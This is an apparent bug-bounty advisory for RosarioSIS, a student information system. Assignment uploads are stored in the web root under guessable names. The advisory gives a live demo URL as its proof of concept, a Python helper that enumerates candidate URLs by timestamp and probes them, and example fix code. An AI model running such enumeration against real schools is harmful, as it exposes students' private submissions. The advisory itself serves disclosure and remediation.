Exposure of Sensitive Information to an Unauthorized Actor in francoisjacquet/rosariosis

Status: Valid

Reported on Apr 29th 2022


Description

Files that students upload as assignment submissions are written under the web root (assets/AssignmentsFiles/...) with a predictable name, so anyone who can guess the path, with or without an account, can download another student's submission directly from the web server, bypassing the application's access control.

Proof of Concept

1. Log in as a student, go to GRADES -> Assignments, submit a file to any assignment and save.

2. An attacker, with or without an account, can then download the file directly from the web server at a URL such as https://www.rosariosis.org/demonstration/assets/AssignmentsFiles/2021/Quarter7/Teacher2/mathematics%206_1_student%20s%20student_2022-04-29%2003_50_45.zip (observed on the public demonstration instance).

3. The file is stored under a web-accessible directory that encodes the school year, marking period and teacher (2021/Quarter7/Teacher2 in the example) with a name of the form {COURSE_TITLE}_{student_name}_{timestamp}.{file_ext}. Every component is either public (course title, student name, directory layout) or narrow (a timestamp with one-second granularity inside the submission window), so the full path is easy to enumerate.
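To make the "easy to enumerate" claim concrete, the following added example (not code from the huntr report or from RosarioSIS) models the search space an attacker faces. It builds names in the layout visible in the report's example URL (course title, student name and a timestamp whose colons are replaced by underscores; the extra numeric segment in the example URL is left out as an assumption), generates one candidate URL per second over a guessed submission window, and probes them through an injected fetch callback so it runs offline. The base directory, the helper names and the fetch callback are this example's own assumptions.

```python
"""Added example: how a predictable submission name turns into a small,
enumerable search space. Not code from the report or from RosarioSIS."""
from datetime import datetime, timedelta
from typing import Callable, Iterator, List
from urllib.parse import quote

# Timestamp layout as seen in the report's example URL: the colons of HH:MM:SS
# are replaced by underscores, the date keeps its hyphens (assumption from the URL).
TS_FMT = "%Y-%m-%d %H_%M_%S"


def submission_name(course_title: str, student_name: str,
                    when: datetime, ext: str) -> str:
    """Build a file name in the observed layout
    {COURSE_TITLE}_{student_name}_{timestamp}.{ext}."""
    return f"{course_title}_{student_name}_{when.strftime(TS_FMT)}.{ext}"


def candidate_urls(base_dir: str, course_title: str, student_name: str,
                   start: datetime, end: datetime, ext: str) -> Iterator[str]:
    """Yield one URL per second in [start, end].

    Course title, student name and the year/quarter/teacher directory are all
    public or guessable, so the upload time is the only unknown left to guess.
    """
    base = base_dir.rstrip("/") + "/"
    t = start
    while t <= end:
        # quote() keeps '_', '-' and '.', and encodes spaces as %20,
        # which matches the URL shown in the report.
        yield base + quote(submission_name(course_title, student_name, t, ext))
        t += timedelta(seconds=1)


def search_space(window: timedelta) -> int:
    """Number of candidate names for a window of the given length."""
    return int(window.total_seconds()) + 1


def probe(urls, fetch: Callable[[str], int]) -> List[str]:
    """Return the URLs for which fetch() reports HTTP 200.

    fetch is injected so this runs offline; against a live target it would
    wrap something like requests.head(url).status_code.
    """
    return [u for u in urls if fetch(u) == 200]


if __name__ == "__main__":
    # A one-hour window around a suspected upload time is only 3601 requests.
    print(search_space(timedelta(hours=1)))
```

A one-hour window costs 3601 requests per (course, student) pair; with the demonstration server answering static-file requests without authentication, nothing rate-limits or logs the guesses at the application layer.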

Way to fix

Two changes address this issue, and they should be applied together:

  • Change the name format so that it cannot be predicted: a random token from a CSPRNG instead of course title, student name and timestamp.

  • Require permission in the download function: serve submissions through an application handler that checks the requester is the submitting student, the course's teacher or an administrator, rather than as static files from the web root.

Renaming alone only raises the cost of guessing while the file is still handed to anyone who learns the URL (from a shared link, a Referer header or a proxy log); the permission check is what actually enforces access control, and the unpredictable name is what keeps submissions from being enumerable even when the storage location is known.
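The shape of a fix that applies both recommendations, as an added example that is not RosarioSIS code and does not reflect the project's actual fix in 8.9.5: submissions are written outside the web root under a random name carrying no course, student or time information, and the only way to retrieve one is through a download function that authorises the requester. The User, Submission and Storage types, the role strings and the teacher-per-course mapping are this example's assumptions about the data model.

```python
"""Added example: random submission names plus an authorised download path.
Not code from RosarioSIS or from the huntr report."""
import os
import secrets
import tempfile
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class User:
    user_id: int
    role: str  # "student", "teacher" or "admin" (assumed role model)


@dataclass
class Submission:
    submission_id: str
    path: str            # absolute path outside the web root
    student_id: int
    course_id: int
    original_name: str   # kept only for a Content-Disposition header


@dataclass
class Storage:
    root: str                                # directory the web server does not serve
    teachers: Dict[int, int]                 # course_id -> teacher user_id (assumed)
    submissions: Dict[str, Submission] = field(default_factory=dict)

    def store(self, student: User, course_id: int,
              original_name: str, data: bytes) -> str:
        """Save under a 256-bit random name and return an opaque id.

        Neither the id nor the on-disk name is derivable from the course,
        the student or the upload time, so there is nothing to enumerate.
        """
        if student.role != "student":
            raise PermissionError("only students submit assignments")
        submission_id = secrets.token_urlsafe(32)
        path = os.path.join(self.root, secrets.token_hex(32))
        with open(path, "wb") as f:
            f.write(data)
        self.submissions[submission_id] = Submission(
            submission_id, path, student.user_id, course_id,
            os.path.basename(original_name))  # never trust a client-supplied path
        return submission_id

    def can_read(self, user: Optional[User], sub: Submission) -> bool:
        """Owner, the course's teacher, or an admin; nobody else."""
        if user is None:
            return False  # anonymous requests get nothing
        if user.role == "admin":
            return True
        if user.role == "teacher":
            return self.teachers.get(sub.course_id) == user.user_id
        return user.role == "student" and sub.student_id == user.user_id

    def download(self, user: Optional[User], submission_id: str) -> bytes:
        """The only read path: look up by opaque id, authorise, then read.

        Unknown ids and forbidden ids raise the same error so the endpoint
        does not confirm which ids exist.
        """
        sub = self.submissions.get(submission_id)
        if sub is None or not self.can_read(user, sub):
            raise PermissionError("not found or not permitted")
        with open(sub.path, "rb") as f:
            return f.read()


def new_storage(teachers: Dict[int, int]) -> Storage:
    """Storage rooted in a fresh temporary directory (stands in for a path
    outside the web root in this example)."""
    return Storage(root=tempfile.mkdtemp(), teachers=teachers)


def denied(storage: Storage, user: Optional[User], submission_id: str) -> bool:
    """True if download() refuses the request."""
    try:
        storage.download(user, submission_id)
    except PermissionError:
        return True
    return False
```

In a PHP application the equivalent is a script that performs the same lookup and role check before calling readfile() on a path under a directory the web server is configured not to serve; what matters is that the static-file path that the report's URL used no longer exists.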

Impact

An unauthenticated or unauthorised user can read other students' assignment submissions, an exposure of sensitive information to an unauthorized actor (CWE-200).

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago
François Jacquet validated this vulnerability 2 years ago
dungtuanha has been awarded the disclosure bounty
François Jacquet marked this as fixed in 8.9.5 with commit d6e4da 2 years ago
François Jacquet has been awarded the fix bounty
This vulnerability will not receive a CVE